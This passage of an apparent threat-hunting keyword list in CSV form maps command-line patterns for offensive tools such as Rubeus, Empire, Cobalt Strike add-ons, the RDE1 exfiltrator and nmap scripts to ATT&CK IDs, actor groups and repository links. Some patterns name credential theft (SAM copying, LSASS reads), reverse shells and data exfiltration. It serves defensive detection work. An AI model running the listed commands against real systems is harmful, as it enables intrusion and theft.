","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"* -ratel *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* RCE.py -*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rde1 crde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rdp * -u * -p * --nla-screenshot*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rdp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rdp-vuln-ms12-020.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ReadFromLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"* -RealCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"* -RealCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rec2 crde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rec2 crde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"* --reflective-injection *","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"* -Registry -AtStartup *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -relayserver *:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"* -remote -bindPipe * -bindPort * -security*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"* -Remote -ExchHostname *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"* -RemoteDllHandle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -remotefilepath *\\*.wav*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" +"* --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* renew *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* renew */ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* repo -u https://github.com/*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"* req -username * -p * -ca * -target * -template * -upn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -request -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -request -format hashcat -outputfile *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --requirement *Exegol/requirements.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"* -Reverse -IPAddress * -Port *","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","Invoke-PowerShellTcp args","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"* reverse_shell_generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" +"* reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -RevToSelf *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -Rhost * -WARFile http*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhosts * -Password * -Directory * -Dictionary *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhosts * -Path *.txt -Port *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 